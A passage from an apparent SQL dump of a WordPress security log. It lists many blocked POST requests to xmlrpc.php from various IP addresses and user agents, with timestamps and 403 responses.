Safari\\/537.36\"}','QlYgeJOjbNXGzWyFZ6o3rpui',0,1681850280.0223,3800,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','E0KUB9tdn2XjDp5yf78q4umW',0,1681850283.4716,857,'','POST',403,0,515,0,1,'',0),('213.152.187.205',3583556557,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KitMk30RuJEwrp6SZ1BcHD9A',0,1681850342.4056,610,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','U93ip8GNjbCHaK5wnXLBDTOZ',0,1681850961.9541,2036,'','POST',403,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','05aCArp3kQO2dbTmejuFnIvW',0,1681850967.6809,599,'','POST',403,0,515,0,1,'',0),('82.165.89.34',1386567970,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','1HwzXlQPnpvb9uVt8rZs6c5W',0,1681850971.7377,559,'','POST',403,0,515,0,1,'',0),('182.50.151.70',3056768838,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','jdYyrwoUn9K6QVI8amesFlSN',0,1681850983.4173,621,'','POST',403,0,515,0,1,'',0),('94.124.93.44',1585208620,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','C8NIJkVyjdO4lSEMALZru0nT',0,1681850987.2111,684,'','POST',403,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','BduHXxvlDZAp4Vtz1Ky2hqs0',0,1681850990.1933,1344,'','POST',403,0,515,0,1,'',0),('81.88.53.33',1364735265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','0xjcbl6C9nTa2Wwq7tXESdg5',0,1681851006.4677,597,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','rkWztKg8NInbPcJmEeHy1spY',0,1681854232.3409,571,'','POST',403,0,515,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OLlj1qJZHEWRQxMnyiPeTGv0',0,1681854235.0587,572,'','POST',403,0,515,0,1,'',0),('64.91.226.29',1079763485,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','I9jQyUBqTn5Oa7txrR6hD8zA',0,1681854257.1819,592,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','h2ysX68B7R1PDSteuxEVoqIC',0,1681854261.4799,599,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','5hMztKjdTOyJ7VN2wuH6cGLb',0,1681854263.1154,581,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','kslTCdWvxr3QLBJoXFDMzUic',0,1681854267.0898,595,'','POST',403,0,515,0,1,'',0),('74.208.57.151',1255160215,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','fqyHOrERSTwWd0MFaGZxVvX5',0,1681854272.2416,1598,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','kt1gL4FxDYVeUbEIp7hvMSN8',0,1681854273.4702,1706,'','POST',404,0,515,0,1,'',0),('64.227.122.94',1088649822,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','wCm5p41OAgWI0L3dQfTHUs6a',0,1681855085.6337,733,'','POST',403,0,515,0,1,'',0),('195.158.22.187',3281917627,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','l3VoearIq41bHdZGsmU0p8LD',0,1681855087.7941,952,'','POST',403,0,515,0,1,'',0),('104.236.7.86',1760298838,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','6udHc5OvismJECWISUM0LFfQ',0,1681855088.3790,824,'','POST',403,0,515,0,1,'',0),('104.236.7.86',1760298838,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','MOwfVy1oIuE7xPAjXSaKJgF8',0,1681855095.0265,598,'','POST',403,0,515,0,1,'',0),('195.158.25.14',3281918222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','BmjzKhC4aW7YiAN8foIRwJcu',0,1681855101.4291,1054,'','POST',403,0,515,0,1,'',0),('35.214.190.212',601276116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','mu3SkewyorsDHILBY8Zj5XqJ',0,1681855101.8578,1005,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','8rPBbt2Hj1EnCzDisugZ4SoN',0,1681855105.3267,612,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','mDxk7tpLSHiI8NcPrlXFehYn',0,1681855109.3322,589,'','POST',403,0,515,0,1,'',0),('31.24.159.204',521707468,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','W2RSCbXztyeNYH0A9BGTF56D',0,1681855116.7420,652,'','POST',403,0,515,0,1,'',0),('201.249.57.131',3388553603,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','FJ6s5NDALYvib843rmIdU9Pu',0,1681855117.9357,635,'','POST',403,0,515,0,1,'',0),('188.166.102.197',3165021893,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','LqGZpHvm8lSAkObJ92u0N53t',0,1681855123.0344,567,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','uPnCgDiXAcOIrFK4UM1ZQ2LV',0,1681858006.5382,4339,'','POST',403,0,515,0,1,'',0),('82.165.88.207',1386567887,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','bJQp3DnZ2BhElCmMfsatO08q',0,1681858022.1398,8507,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','LNcwhEpPOQ4Yi0m8zXHZ9rxM',0,1681858025.3488,10391,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','dnVsS8tFjOwHX1PNGMUAYC6a',0,1681858038.7392,5507,'','POST',403,0,515,0,1,'',0),('129.226.208.121',2179125369,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','oTGihHYc8NgOCelAnWZXtqKL',0,1681858039.7491,4918,'','POST',403,0,515,0,1,'',0),('192.18.130.131',3222438531,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','NZFwAClOUvK4EbcmDTPj1ezh',0,1681858044.3409,1429,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','iopCPGJ7xYTXcBWDe2vwbO9q',0,1681858058.2504,562,'','POST',403,0,515,0,1,'',0),('173.44.55.155',2905356187,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xCt3guoDZychjRkEL8YHedBW',0,1681860046.3388,4825,'','POST',403,0,515,0,1,'',0),('82.165.80.95',1386565727,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','cJNdIy4YreZg2ljHWTEAinM0',0,1681860152.0494,2886,'','POST',403,0,515,0,1,'',0),('41.72.149.125',692622717,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','BNGUtbrdm8IheMFCwDs6XVRx',0,1681860156.1046,584,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','CbIoHBLe6Vc5m81pdw3yNqXl',0,1681860161.3798,610,'','POST',403,0,515,0,1,'',0),('81.88.53.58',1364735290,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','wnpBMmdfTU5YaLeqtjEkbOsx',0,1681860163.8265,571,'','POST',403,0,515,0,1,'',0),('124.158.10.139',2090732171,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','IrQ6A5vWDTUjFXptoxR3a9sC',0,1681860165.4511,549,'','POST',403,0,515,0,1,'',0),('161.97.187.66',2707536706,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','5A8MCLHufZIYn7j9OorW2qgE',0,1681860175.0489,1390,'','POST',403,0,515,0,1,'',0),('141.98.115.182',2372039606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','ri9tzlawpNA0VBGQfLsP6EYD',0,1681860176.2830,774,'','POST',403,0,515,0,1,'',0),('185.162.147.177',3114439601,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','3GCzjVIbvTJMeQsgFLXHxm1y',0,1681860181.3945,605,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','p0qKvWyLQnsGCcJg3uzY69B8',0,1681860185.3949,570,'','POST',403,0,515,0,1,'',0),('91.134.248.249',1535572217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','a1oGPZsCdq3zYlSrx4EUAWI6',0,1681860194.6615,579,'','POST',403,0,515,0,1,'',0),('185.183.106.3',3115805187,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8ChdVkLQ65lbcHeKrY2FMNSq',0,1681860837.0549,2659,'','POST',403,0,515,0,1,'',0),('68.178.228.199',1152574663,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','wncaulExok5UWA9P6QFb08Ti',0,1681862102.2419,4617,'','POST',403,0,515,0,1,'',0),('82.165.89.17',1386567953,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','mzV6XRqQEKcy3rv54iH2F8ft',0,1681862106.0462,1418,'','POST',403,0,515,0,1,'',0),('185.25.23.45',3105429293,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','Mzlx7bSwHk9D2U6YPtaog8iV',0,1681862112.6662,1676,'','POST',403,0,515,0,1,'',0),('196.189.44.24',3300731928,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','CI2cvgbkBJSolxfG6yAepWq9',0,1681862113.8601,2198,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','hscDSp0Q7IJEuBd4HV1Maxlv',0,1681862115.3756,1804,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','m0jytZsBYuU4qaE3STGkiWPd',0,1681862129.7657,1480,'','POST',403,0,515,0,1,'',0),('51.79.241.226',860877282,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','zgyIaxJef20pH6AYsLbBhNZt',0,1681862134.0891,1967,'','POST',403,0,515,0,1,'',0),('185.182.56.150',3115726998,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','SUyDTp2Fm0WdMvAOwP1VC45o',0,1681862135.4506,2207,'','POST',403,0,515,0,1,'',0),('64.91.226.29',1079763485,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','poehO0bQuLXBC852V9Ei6gYc',0,1681862139.1963,610,'','POST',403,0,515,0,1,'',0),('103.255.237.7',1744825607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','BZzcX4hHklo7gxq8DJ6bLt2E',0,1681862147.0508,604,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','p29oAhzbWwdX4ukxGyicJSrY',0,1681862149.4696,564,'','POST',403,0,515,0,1,'',0),('92.205.53.115',1556952435,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','zDMvwaGceoKLFfXJVAjWRgls',0,1681862151.8007,617,'','POST',403,0,515,0,1,'',0),('65.109.24.229',1097668837,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','4Z1lw6V3omsLQvT2Onu9JPgM',0,1681862753.3471,2795,'','POST',403,0,515,0,1,'',0),('189.112.112.157',3178262685,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','ij3Iy4nuPEYBGbKWgwLaeHFq',0,1681862756.0241,1423,'','POST',403,0,515,0,1,'',0),('65.109.24.229',1097668837,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','x3g1FemyYzEd4hblaXtonRIp',0,1681862756.3578,1257,'','POST',403,0,515,0,1,'',0),('31.220.74.65',534530625,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','c1Cw4uzT3EhxXjsBdf6NLSm2',0,1681862764.2701,1407,'','POST',403,0,515,0,1,'',0),('82.165.88.9',1386567689,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','awMoQcRxvAEJ2WHlGZIC1XfD',0,1681862764.5632,1254,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','srLqh3tYb9UVEePg56jzR01F',0,1681862768.5626,671,'','POST',403,0,515,0,1,'',0),('139.59.249.97',2335963489,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','79bHE1CeF0yBTZcOG3a5xUVt',0,1681862771.9442,623,'','POST',403,0,515,0,1,'',0),('103.147.241.45',1737748781,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','25ail4J8eAOsWKBvtN3InkX7',0,1681862773.9832,1548,'','POST',403,0,515,0,1,'',0),('185.162.147.177',3114439601,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','AyP03oJixkBVQOGIuZb6cmTg',0,1681862781.5759,649,'','POST',403,0,515,0,1,'',0),('72.167.125.153',1218936217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','JH78uCSviKgNXE3V25rWeyts',0,1681862790.6979,673,'','POST',403,0,515,0,1,'',0),('185.200.116.211',3116922067,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','JjSOPp5ChF6EkqsBKW4LAYft',0,1681863306.7822,3734,'','POST',403,0,515,0,1,'',0),('199.249.230.27',3355043355,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6IPJBADLaU5S3QHsluvwp7ky',0,1681863465.1248,2894,'','POST',403,0,515,0,1,'',0),('213.152.162.89',3583550041,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bWwa7ITfDnrjEMNRhLxB1AGq',0,1681865174.1383,3615,'','POST',403,0,515,0,1,'',0),('213.152.187.205',3583556557,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','JKMOCp9hDtbEAo57IWGmkzQT',0,1681866395.8117,4071,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','5EpIGNykac9sd6Omuj2VRZF0',0,1681866771.3611,1708,'','POST',403,0,515,0,1,'',0),('173.212.199.147',2916403091,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','bhy1AQaWNSTVDERxZpiBrs02',0,1681866776.4433,566,'','POST',403,0,515,0,1,'',0),('140.83.54.43',2354263595,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','MIjb2gcSHfF5PhE38ZUq0vXG',0,1681866785.6108,694,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','7y4FD3ASloJrcTm8xCpL2Pwa',0,1681866788.6686,588,'','POST',403,0,515,0,1,'',0),('81.88.53.38',1364735270,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','mqzeHgVFdMOLTrAK3vkPBiJN',0,1681866794.4007,786,'','POST',403,0,515,0,1,'',0),('81.88.53.38',1364735270,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','vMwZAa7Fhycgqf9bP36tIkdr',0,1681866798.5446,680,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','MfeERYmny5OJFQo74dL0hKg2',0,1681866803.6609,651,'','POST',403,0,515,0,1,'',0),('182.92.154.26',3059522074,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','NHGC2SY3DkzTeJA05Puv7jlL',0,1681866809.2052,610,'','POST',403,0,515,0,1,'',0),('104.254.90.251',1761499899,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 